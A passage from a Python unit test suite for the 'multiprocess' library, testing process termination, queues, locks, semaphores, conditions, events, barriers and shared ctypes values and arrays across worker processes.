self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
@classmethod
def _test_terminate(cls):
time.sleep(100)
def test_terminate(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._test_terminate)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
p.terminate()
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
# XXX sometimes get p.exitcode == 0 on Windows ...
#self.assertEqual(p.exitcode, -signal.SIGTERM)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
@unittest.skipIf(True, "fails with is_dill(obj, child=True)")
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("__init__.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
sys.stderr = open(testfn, 'w')
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
sys.stderr = open(testfn, 'w')
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason, code in (([1, 2, 3], 1), ('ignore this', 1)):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, code)
with open(testfn, 'r') as f:
self.assertEqual(f.read().rstrip(), str(reason))
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
p.join(5)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocess as multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 30 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.170)
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
def test_lock_context(self):
with self.Lock():
pass
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
@classmethod
def f(cls, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in range(6):
sleeping.acquire()
# check they have all timed out
for i in range(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in range(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
for i in range(10):
try:
if get_value(woken) == 6:
break
except NotImplementedError:
break
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
@classmethod
def _test_waitfor_f(cls, cond, state):
with cond:
state.value = 0
cond.notify()
result = cond.wait_for(lambda : state.value==4)
if not result or state.value != 4:
sys.exit(1)
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', -1)
p = self.Process(target=self._test_waitfor_f, args=(cond, state))
p.daemon = True
p.start()
with cond:
result = cond.wait_for(lambda : state.value==0)
self.assertTrue(result)
self.assertEqual(state.value, 0)
for i in range(4):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertFalse(p.is_alive())
self.assertEqual(p.exitcode, 0)
@classmethod
def _test_waitfor_timeout_f(cls, cond, state, success, sem):
sem.release()
with cond:
expected = 0.1
dt = time.time()
result = cond.wait_for(lambda : state.value==4, timeout=expected)
dt = time.time() - dt
# borrow logic in assertTimeout() from test/lock_tests.py
if not result and expected * 0.6 < dt < expected * 10.0:
success.value = True
@unittest.skipUnless(HAS_SHAREDCTYPES, 'needs sharedctypes')
def test_waitfor_timeout(self):
# based on test in test/lock_tests.py
cond = self.Condition()
state = self.Value('i', 0)
success = self.Value('i', False)
sem = self.Semaphore(0)
p = self.Process(target=self._test_waitfor_timeout_f,
args=(cond, state, success, sem))
p.daemon = True
p.start()
self.assertTrue(sem.acquire(timeout=10))
# Only increment 3 times, so state == 4 is never reached.
for i in range(3):
time.sleep(0.01)
with cond:
state.value += 1
cond.notify()
p.join(5)
self.assertTrue(success.value)
@classmethod
def _test_wait_result(cls, c, pid):
with c:
c.notify()
time.sleep(1)
if pid is not None:
os.kill(pid, signal.SIGINT)
def test_wait_result(self):
if isinstance(self, ProcessesMixin) and sys.platform != 'win32':
pid = os.getpid()
else:
pid = None
c = self.Condition()
with c:
self.assertFalse(c.wait(0))
self.assertFalse(c.wait(0.1))
p = self.Process(target=self._test_wait_result, args=(c, pid))
p.start()
self.assertTrue(c.wait(10))
if pid is not None:
self.assertRaises(KeyboardInterrupt, c.wait, 10)
p.join()
class _TestEvent(BaseTestCase):
@classmethod
def _test_event(cls, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily, due to API shear, this does not
# work with threading._Event objects. is_set == isSet
self.assertEqual(event.is_set(), False)
# Removed, threading.Event.wait() will return the value of the __flag
# instead of None. API Shear with the semaphore backed mp.Event
self.assertEqual(wait(0.0), False)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), False)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), True)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
p = self.Process(target=self._test_event, args=(event,))
p.daemon = True
p.start()
self.assertEqual(wait(), True)
#
# Tests for Barrier - adapted from tests in test/lock_tests.py
#
# Many of the tests for threading.Barrier use a list as an atomic
# counter: a value is appended to increment the counter, and the
# length of the list gives the value. We use the class DummyList
# for the same purpose.
class _DummyList(object):
def __init__(self):
wrapper = multiprocessing.heap.BufferWrapper(struct.calcsize('i'))
lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
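# Illustrative note (not part of the original test suite): _DummyList is a
# process-safe counter with a list-like surface, which lets Bunch reuse the
# "append to count" idiom from the threading.Barrier tests, e.g.
#
#     counter = _DummyList()
#     counter.append(True)   # atomically bumps the shared integer
#     len(counter)           # current count, visible from any process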
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
f(*args)
b.wait_for_finished()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
